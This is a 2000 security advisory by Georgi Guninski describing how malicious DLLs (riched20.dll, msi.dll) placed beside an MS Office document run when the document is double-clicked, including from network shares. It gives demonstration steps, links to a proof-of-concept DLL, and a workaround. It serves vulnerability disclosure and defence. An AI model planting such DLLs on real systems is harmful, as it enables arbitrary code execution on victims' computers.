[ advisories | exploits | discussions | news | conventions | security tools | texts & papers ]
 main menu
- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news
 
 discussions
- read forum
- new topic
- search
 

 meetings
- meetings list
- recent additions
- add your info
 
 top 100 sites
- visit top sites
- sign up now
- members
 
 webmasters

- add your url
- add domain
- search box
- link to us

 
 projects
- our projects
- free email
 
 m4d network
- security software
- secureroot
- m4d.com
Home : Advisories : Double clicking on MS Office documents

Title: Double clicking on MS Office documents
Released by: Georgi Guninski
Date: 18th September 2000
Printable version: Click here 
Georgi Guninski security advisory #21, 2000



Double clicking on MS Office dpocuments from Windows Explorer may

execute arbitrary programs in some cases



Systems affected:

MS Office 2000, Win98/Win2000 probably other applications



Risk: Medium

Date: 18 September 2000



Legal Notice:

This Advisory is Copyright (c) 2000 Georgi Guninski. You may distribute

it unmodified. You may not modify it and distribute it or distribute

parts of it without the author's written permission.



Disclaimer:

The opinions expressed in this advisory and program are my own and not

of any company.

The usual standard disclaimer applies, especially the fact that Georgi

Guninski

is not liable for any damages caused by direct or  indirect use of the

information or functionality provided by this advisory or program.

Georgi Guninski, bears no responsibility for content or misuse of this

advisory or program or any derivatives thereof.





Description:



If certain DLLs are present in the current direcotory and the user

double clicks on

a MS Office Document or launch the document from "Start | Run" then the

DLLs are executed.

This allows executing native code and may lead to taking full control

over user's computer.

It also works on remote UNC shares.





Details:

If either of the following files:

riched20.dll

or

msi.dll

(other DLLs also may do, don't know)

are present in the current directory, double clicking on an Office

document in the current directory executes

the code in DllMain() of the above DLLs.

(Excel seems not to work with riched20.dll but works with msi.dll).

I could not make this work from HTML and IE, if you can, please let me

know.



Demonstration:

1) Download dll1.cpp from http://www.guninski.com/dll1.cpp and build it.

I discourage downloading native code from unknown site, but you may try

at your own risk

the compiled version: http://www.guninski.com/dll1.dll

2) Rename dll1.dll to riched20.dll

3) Place riched20.dll in a directory of your choice

4) Close all Office applications

5) From Windows Explorer double click on an Office document (preferably

MS Word document)

in the directory containg riched20.dll





Workaround: Do not double click on Office documents or use "Start | Run

... office.doc".

            Instead start the Office application from "Start Menu" and

then use "File | Open"






(C) 1999-2000 All rights reserved.